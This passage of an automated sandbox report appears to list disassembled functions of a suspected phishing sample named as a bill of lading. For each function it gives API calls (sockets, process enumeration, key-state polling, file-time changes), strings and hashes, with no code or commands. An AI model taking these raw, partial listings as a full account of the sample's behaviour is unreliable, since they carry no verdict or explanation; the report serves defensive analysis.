                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2406429042-0
                                                                                                                      • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                      • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                                                                      • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                      • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                                                                      Function 0045D517 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 91COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                                                                      • GetLastError.KERNEL32 ref: 0045D59D
                                                                                                                      • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                      • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                      • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                                                                      • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                      • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                                                                      Function 0047AD92 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                                                        • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                                                        • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                        • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                      • _wcslen.LIBCMT ref: 0047AE18
                                                                                                                      • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                                                                      • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                                                                      • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 1915432386-2761332787
                                                                                                                      • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                      • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                                                                      • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                      • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                                                                      Function 0044ED9A Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 448COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DEFINE$`$h$h
                                                                                                                      • API String ID: 0-4194577831
                                                                                                                      • Opcode ID: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
                                                                                                                      • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                                                                                      • Opcode Fuzzy Hash: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
                                                                                                                      • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                                                                                      Function 0046483C Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                                                                                                                      • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                                                                      • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                                                                                                                      • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                                                                      • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$bindclosesocketsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2609815416-0
                                                                                                                      • Opcode ID: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
                                                                                                                      • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                                                                      • Opcode Fuzzy Hash: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
                                                                                                                      • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                                                                      Function 0043701F Relevance: 10.6, APIs: 7, Instructions: 76processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                                                      • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                                                      • __wsplitpath.LIBCMT ref: 004370A5
                                                                                                                        • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                      • _wcscat.LIBCMT ref: 004370BA
                                                                                                                      • __wcsicoll.LIBCMT ref: 004370C8
                                                                                                                      • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2547909840-0
                                                                                                                      • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                      • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                                                                      • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                      • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                                                                      Function 00452126 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127filesleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                                                      • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                                                      • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 2693929171-438819550
                                                                                                                      • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                      • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                                                                      • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                      • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                                                                      Function 00436431 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __wcsicoll.LIBCMT ref: 0043643C
                                                                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                                                                      • __wcsicoll.LIBCMT ref: 00436466
                                                                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicollmouse_event
                                                                                                                      • String ID: DOWN
                                                                                                                      • API String ID: 1033544147-711622031
                                                                                                                      • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                      • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                                                                      • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                      • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                                                                      Function 004741BB Relevance: 7.6, APIs: 5, Instructions: 137networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4170576061-0
                                                                                                                      • Opcode ID: cabea8b38002fa781011b5f0595ab941099387897a9684b67fae1790c0a48004
                                                                                                                      • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                                                                      • Opcode Fuzzy Hash: cabea8b38002fa781011b5f0595ab941099387897a9684b67fae1790c0a48004
                                                                                                                      • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                                                                      Function 00456354 Relevance: 7.6, APIs: 5, Instructions: 127keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                      • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                      • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                      • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3539004672-0
                                                                                                                      • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                      • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                                                                      • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                      • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                                                                      Function 004772DE Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                      • IsWindowVisible.USER32 ref: 00477314
                                                                                                                      • IsWindowEnabled.USER32 ref: 00477324
                                                                                                                      • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                                                                      • IsIconic.USER32 ref: 0047733F
                                                                                                                      • IsZoomed.USER32 ref: 0047734D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 292994002-0
                                                                                                                      • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                      • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                                                                      • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                      • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                                                                      Function 00436D2D Relevance: 7.6, APIs: 5, Instructions: 52filetimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                      • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3397143404-0
                                                                                                                      • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                      • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                                                                      • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                      • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                                                                      Function 0044EBBC Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 551COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strncmp
                                                                                                                      • String ID: ACCEPT$^$h
                                                                                                                      • API String ID: 909875538-4263704089
                                                                                                                      • Opcode ID: a6541d7913cd7701a75e3a8dc778404717b64597fc065691f0327c8a2e2ba149
                                                                                                                      • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                                                                                                      • Opcode Fuzzy Hash: a6541d7913cd7701a75e3a8dc778404717b64597fc065691f0327c8a2e2ba149
                                                                                                                      • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                                                                                                      Function 0045C999 Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3541575487-0
                                                                                                                      • Opcode ID: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
                                                                                                                      • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                                                                      • Opcode Fuzzy Hash: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
                                                                                                                      • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                                                                      Function 00436ADE Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                                                                      • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
